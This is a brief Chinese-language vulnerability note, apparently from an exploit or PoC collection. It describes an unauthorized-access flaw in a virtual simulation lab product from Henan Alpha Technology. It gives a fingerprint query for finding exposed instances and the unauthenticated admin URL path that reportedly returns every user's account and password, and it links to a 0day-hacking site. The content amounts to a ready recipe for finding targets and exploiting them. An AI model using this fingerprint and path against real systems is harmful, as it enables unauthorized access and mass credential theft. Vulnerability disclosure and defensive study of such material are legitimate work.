阿尔法科技 虚拟仿真实验室 存在未授权访问漏洞,通过访问构造的Url可以获取敏感信息
[!NOTE] 虚拟仿真实验室
[!NOTE]
虚拟仿真实验室
[!NOTE] body="河南阿尔法科技有限公司"
body="河南阿尔法科技有限公司"
未授权的Url为
/admin/student/studentlist.html?page=1
成功获取所有用户的账号密码信息
http://www.0dayhack.net/index.php/1702/